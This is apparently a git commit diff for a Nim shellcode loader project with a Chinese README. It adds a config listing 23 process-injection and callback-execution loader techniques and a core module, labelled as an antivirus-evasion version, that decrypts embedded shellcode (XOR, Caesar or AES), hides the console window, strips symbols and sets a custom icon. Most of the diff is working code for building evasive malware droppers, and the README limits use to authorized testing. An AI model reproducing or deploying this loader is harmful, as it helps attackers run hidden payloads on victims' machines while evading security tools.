aeverj
diff --git a/‎.gitignore‎
Lines changed: 25 additions & 8 deletions b/‎.gitignore‎
Lines changed: 25 additions & 8 deletions
diff --git a/‎Compiler.ini‎
Lines changed: 0 additions & 24 deletions b/‎Compiler.ini‎
Lines changed: 0 additions & 24 deletions
diff --git a/‎Direct_Load.nim‎
Lines changed: 0 additions & 20 deletions b/‎Direct_Load.nim‎
Lines changed: 0 additions & 20 deletions
diff --git a/‎README.md‎
Lines changed: 25 additions & 13 deletions b/‎README.md‎
Lines changed: 25 additions & 13 deletions
diff --git a/‎bin/.gitkeep‎ b/‎bin/.gitkeep‎
diff --git a/‎config/Compiler.ini‎
Lines changed: 24 additions & 0 deletions b/‎config/Compiler.ini‎
Lines changed: 24 additions & 0 deletions
diff --git a/‎core/public.nim‎
Lines changed: 185 additions & 0 deletions b/‎core/public.nim‎
Lines changed: 185 additions & 0 deletions
@@ -1,13 +1,30 @@
-# Created by https://www.toptal.com/developers/gitignore/api/nim
-# Edit at https://www.toptal.com/developers/gitignore?templates=nim
-
 ### Nim ###
 nimcache/
 nimblecache/
 htmldocs/
-.idea/
+bin/*
+# 保留 bin 目录结构但忽略内容（配合你添加的 .gitkeep）
+!bin/.gitkeep
+
+### Build/Binary ###
 *.exe
-codeLoader/codeLoader/bin
-codeLoader/codeLoader/obj
-codeLoader/.vs
-# End of https://www.toptal.com/developers/gitignore/api/nim
+*.dll
+*.7z
+*.o
+*.obj
+
+### IDE / Visual Studio ###
+.idea/
+.vs/
+*.user
+*.suo
+*.userosscache
+*.sln.docstates
+
+### Specific Project ignores ###
+# 之前的 gui/codeLoader/bin/ 等已经被上面的规则涵盖了，可以精简
+# 但保留特定配置以防万一
+gui/codeLoader/bin/
+gui/codeLoader/obj/
+gui/codeLoader/config
+*.rc
@@ -9,6 +9,8 @@
 
 ## 更新：
 
+**20260211：项目重构，增加aes和xor加密方式**
+
 **20231228：图标自定义功能**
 
 **20230826：支持nim的v2.0版本，去除base64编码，减小文件生成体积**
@@ -21,38 +23,48 @@
 
 ## 特点：
 
-1：自带四种加载方式
+1：自带23种加载方式
 
 2：可自行拓展加载方式
 
-3：支持两种加密技术，分别位`3des`加密和凯撒密码，密钥随机，每次生成文件拥有不同hash
+3：支持三种加密技术，分别为凯撒密码、`AES`加密和异或加密，密钥随机，每次生成文件拥有不同hash
 
 4：图标可以自定义
 
 <h3 style="color: red;">仅限用于技术研究和获得正式授权的测试活动。</h3>
 
 ## 文件组成：
 
-**`bin` 中存放生成的可执行文件**
+**`bin/` 存放生成的可执行文件**
+
+**`loaders/` 存放所有shellcode加载器实现文件**
+
+**`encryption/` 存放加密算法实现文件（AES、Caesar、XOR）**
+
+**`core/` 存放核心公共模块（public.nim）**
 
-**`encryption` 存放加密代码文件**
+**`gui/` 存放C#图形界面程序**
+
+**`config/` 存放配置文件（Compiler.ini）**
+
+**`pic/` 存放文档图片资源**
 
 ![file](pic/file.png)
 
-## 安装：
+## 安装和使用：
 
 **1、安装`nim`最新版**
  - 从[下载页面](https://nim-lang.org/install_windows.html)，分别下载nim的安装包和编译器mingw64，将两者解压到任意目录，分别将两个文件夹里面的bin文件夹路径添加到path环境变量中
  - 打开命令行，输入nim回车，输入gcc或g++回车，返回正常即可之后正常使用nim来编译程序
- - 需要安装[winim](https://github.com/khchen/winim)
-
-**2、下载本项目，分别编译`encryption`中的`Tdea.nim`和`Caesar.nim`。**
 
-`nim c -d:release -d:strip --opt:size Tdea.nim`
+**2、下载安装依赖。**
 
-`nim c -d:release -d:strip --opt:size Caesar.nim`
+```
+nimble install nimcrypto
+nimble install winim
+```
 
-**3、编译c#项目，将可执行文件放到当前目录**
+**3、从[Release](https://github.com/aeverj/NimShellCodeLoader/releases)下载,运行根目录`codeLoader.exe`**
 
 ## 使用方法：
 
@@ -96,8 +108,8 @@ https://github.com/S4R1N/AlternativeShellcodeExec
 
 - [x] 添加图标自定义功能
 
-- [ ] 增加更多的加载方式
+- [x] 增加更多的加载方式
 
 - [ ] 增加反沙箱等功能
 
-- [ ] 增加加密方式
+- [x] 增加加密方式
@@ -0,0 +1,24 @@
+[compile]
+OEP Hijack-Inject Load=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\OEP_Hijack_Inject_Load.nim
+Thread Hijack-Inject Load=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\Thread_Hijack_Inject_Load.nim
+APC-Inject Load=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\APC_Inject_Load.nim
+Early Bird APC-Inject Load=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\Early_Bird_APC_Inject_Load.nim
+Direct Load=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\Direct_Load.nim
+CreateThreadPoolWait Load=nim c -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\Thread_Pool_Wait.nim
+Fiber Load=nim c -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\Fiber_Load.nim
+CertEnumSystemStore-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\CertEnumSystemStore.nim
+CertEnumSystemStoreLocation-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\CertEnumSystemStoreLocation.nim
+CopyFile2-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\CopyFile2.nim
+CopyFileEx-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\CopyFileEx.nim
+CreateTimerQueueTimer_Tech-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\CreateTimerQueueTimer_Tech.nim
+CryptEnumOIDInfo-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\CryptEnumOIDInfo.nim
+EnumChildWindows-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumChildWindows.nim
+EnumDesktopW-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumDesktopW.nim
+EnumDesktopWindows-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumDesktopWindows.nim
+EnumDirTreeW-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumDirTreeW.nim
+EnumDisplayMonitors-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumDisplayMonitors.nim
+EnumFontFamiliesExW-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumFontFamiliesExW.nim
+EnumFontFamiliesW-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumFontFamiliesW.nim
+EnumFontsW-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumFontsW.nim
+EnumLanguageGroupLocalesW-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumLanguageGroupLocalesW.nim
+EnumObjects-ACE=nim cpp -d:<encrypt> <ico> -d:release -d:source="<source>" -o:.\bin\ -f loaders\EnumObjects.nim
@@ -0,0 +1,185 @@
+## Nim ShellCode Loader - 免杀版本
+## 强制使用 XOR 加密
+
+{.passL: "-static".}
+{.passL: "-Wl,--no-insert-timestamp".}
+{.passL: "-Wl,--strip-all".}
+{.passL: "-s".}                    # strip 符号表
+{.passL: "-mwindows".}             # GUI 模式（隐藏控制台）
+{.passC: "-Os".}                   # 优化体积
+
+import strutils
+
+# ============================================================================
+# 全局变量
+# ============================================================================
+
+const source {.strdefine.}: string = ""
+var code* {.exportc.}: cstring
+var codelen* {.exportc.}: cint = 0
+
+# ============================================================================
+# XOR 加密/解密
+# ============================================================================
+
+when defined(XOR):
+    # 生成加密文件
+    const encryptedFilePathRaw = staticExec(
+            "nim r --hints:off ../encryption/Xor.nim " & source)
+    const encryptedFilePath = block:
+        let lines = encryptedFilePathRaw.splitLines()
+        var result = ""
+        for line in lines:
+            let trimmed = line.strip()
+            if trimmed.len > 0 and (trimmed.startsWith("C:\\") or
+                    trimmed.startsWith("/")):
+                result = trimmed
+        result
+
+    when encryptedFilePath == "":
+        {.error: "Failed to generate XOR encrypted file. Output: " & encryptedFilePathRaw.}
+
+    # 加载加密数据（编译时）
+    const encryptedDataConst = staticRead(encryptedFilePath)
+
+    # 运行时解密和初始化
+    proc initXorShellcode() =
+        # 计算payload长度
+        let payloadLen = encryptedDataConst.len - 16
+
+        # 分配内存并复制数据
+        var buffer = newString(payloadLen)
+        for i in 0..<payloadLen:
+            buffer[i] = encryptedDataConst[16 + i]
+
+        # 解密（直接操作buffer）
+        let bufferPtr = cast[ptr UncheckedArray[byte]](addr buffer[0])
+        for i in 0..<payloadLen:
+            bufferPtr[i] = bufferPtr[i] xor encryptedDataConst[i mod 16].byte
+
+        # 设置全局变量
+        code = cstring(buffer)
+        codelen = cast[cint](payloadLen)
+
+    initXorShellcode()
+
+# ============================================================================
+# Caesar 解密
+# ============================================================================
+
+elif defined(Caesar):
+    import sequtils
+
+    # 生成加密文件
+    const encryptedFilePathRaw = staticExec(
+            "nim r --hints:off ../encryption/Caesar.nim " & source)
+    const encryptedFilePath = encryptedFilePathRaw.splitLines()[^1].strip()
+
+    # 加载加密数据
+    const encryptedDataConst = staticRead(encryptedFilePath)
+
+    proc initCaesarShellcode() =
+        let encryptedData = encryptedDataConst
+        let dictionary = encryptedData[0..255].mapIt(it.byte)
+        let encryptedTable = encryptedData[256..high(encryptedData)].mapIt(it.byte)
+        var temp: string = ""
+        temp.setLen(encryptedTable.len)
+
+        for round in 0..254:
+            for idx in 0..high(encryptedTable):
+                temp[idx] = cast[cchar](dictionary[encryptedTable[idx]])
+
+        code = cstring(temp)
+        codelen = cast[cint](encryptedTable.len)
+
+    initCaesarShellcode()
+
+# ============================================================================
+# AES-256-CTR 解密
+# ============================================================================
+
+elif defined(AES):
+    import nimcrypto
+
+    # 生成加密文件
+    const encryptedFilePathRaw = staticExec(
+            "nim r --hints:off ../encryption/Aes256Ctr.nim " & source)
+    const encryptedFilePath = encryptedFilePathRaw.splitLines()[^1].strip()
+
+    # 加载加密数据
+    const encryptedDataConst = staticRead(encryptedFilePath)
+
+    proc initAesShellcode() =
+        let encryptedData = encryptedDataConst
+        const envKey: string = "TARGETDOMAIN"
+        var
+            dctx: CTR[aes256]
+            key: array[aes256.sizeKey, byte]
+            iv: array[aes256.sizeBlock, byte]
+
+        for i in 0..15:
+            iv[i] = encryptedData[i].byte
+
+        let encryptedTextLen = encryptedData.len - 16
+        var encryptedText = newSeq[byte](encryptedTextLen)
+        var decryptedText = newSeq[byte](encryptedTextLen)
+
+        for i in 0 ..< encryptedTextLen:
+            encryptedText[i] = encryptedData[i + 16].byte
+
+        var expandedKey = sha256.digest(envKey)
+        copyMem(addr key[0], addr expandedKey.data[0], len(expandedKey.data))
+
+        dctx.init(key, iv)
+        dctx.decrypt(encryptedText, decryptedText)
+        dctx.clear()
+
+        code = cast[cstring](alloc0(encryptedTextLen))
+        copyMem(code, addr decryptedText[0], encryptedTextLen)
+        codelen = cast[cint](encryptedTextLen)
+
+    initAesShellcode()
+
+# ============================================================================
+# 无加密（直接读取）
+# ============================================================================
+
+else:
+    # 直接读取shellcode（未加密）
+    const shellcodeDataConst = staticRead(source)
+
+    proc initPlainShellcode() =
+        var temp: string = shellcodeDataConst
+        code = cstring(temp)
+        codelen = cast[cint](shellcodeDataConst.len)
+
+    initPlainShellcode()
+
+# ============================================================================
+# Windows 图标嵌入
+# ============================================================================
+
+when defined(gcc) and defined(windows) and defined(icoPath):
+    import strformat, os
+    const icoPath {.strdefine.}: string = ""
+
+    static:
+        const rcName = getTempDir() / "demo.rc"
+        const iconObject = getTempDir() / "demo_icon.o"
+
+        assert(icoPath != "", "Icon file path not set!")
+        assert(fileExists(icoPath), &"Icon file does not exist: {icoPath}")
+
+        const resourceText = &"1 ICON \"{icoPath}\""
+        writeFile(rcName, resourceText)
+        assert(fileExists(rcName), &"Failed to generate resource file: {rcName}")
+
+        when defined(x86):
+            {.link: "demo.res".}
+        else:
+            const windresCmd = "cmd /c \"windres -i " & rcName & " -o " & iconObject & "\""
+            discard staticExec(windresCmd & " 2>&1")
+            assert(fileExists(iconObject),
+                   &"Failed to generate object file: {iconObject}\n" &
+                   "Check: ICO format valid? windres in PATH?")
+            {.link: iconObject.}